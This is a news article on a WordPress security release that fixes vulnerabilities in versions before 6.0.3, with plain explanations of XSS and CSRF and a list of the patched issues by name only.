WordPress has released a security update that addresses more than a dozen vulnerabilities of varying severity.
WordPress released a security update to address multiple vulnerabilities discovered in WordPress versions prior to 6.0.3. WordPress has also updated all versions since 3.7.
Vulnerability to Cross-Site Scripting (XSS)
The National Vulnerability Database of the United States Government has issued warnings about several vulnerabilities affecting WordPress.
WordPress is vulnerable to a variety of vulnerabilities, including a type known as Cross Site Scripting, abbreviated as XSS.
A cross site scripting vulnerability occurs when a web application, such as WordPress, fails to properly check (sanitise) what is entered into a form or uploaded via an upload input.
An attacker can send a malicious script to a user who visits the site, who then executes the malicious script, providing the attacker with sensitive information or cookies containing user credentials.
Another discovered vulnerability is known as a Stored XSS, and it is generally thought to be worse than a regular XSS attack.
A stored XSS attack stores the malicious script on the website and executes it when a user or logged-in user visits the website.
The third type of discovered vulnerability is known as a Cross-Site Request Forgery (CSRF).
This type of vulnerability is described on the non-profit Open Web Application Security Project (OWASP) security website:
“Cross-Site Request Forgery (CSRF) is an attack that forces an authenticated end user to perform unwanted actions on a web application.”
An attacker can trick users of a web application into performing actions of the attacker’s choosing with the help of social engineering (such as sending a link via email or chat).
A successful CSRF attack can force a normal user to perform state-changing requests such as transferring funds, changing their email address, and so on.
CSRF can compromise the entire web application if the victim is an administrative account.”These are the vulnerabilities discovered:
- Stored XSS via wp-mail.php (post by email)
- Open redirect in `wp_nonce_ays`
- Sender’s email address is exposed in wp-mail.php
- Media Library – Reflected XSS via SQLi
- Cross-Site Request Forgery (CSRF) in wp-trackback.php
- Stored XSS via the Customizer
- Revert shared user instances introduced in 50790
- Stored XSS in WordPress Core via Comment Editing
- Data exposure via the REST Terms/Tags Endpoint
- Content from multipart emails leaked
- SQL Injection due to improper sanitization in `WP_Date_Query`
- RSS Widget: Stored XSS issue
- Stored XSS in the search block
- Feature Image Block: XSS issue
- RSS Block: Stored XSS issue
- Fix widget block XSS
WordPress advised all users to immediately update their websites.
According to the official WordPress announcement:
“Several security fixes are included in this release.” Because this is a security release, you should update your sites right away.
“All WordPress versions since 3.7 have also been updated.”
The official WordPress announcement can be found here:
Examine the entries in the National Vulnerability Database for the following vulnerabilities: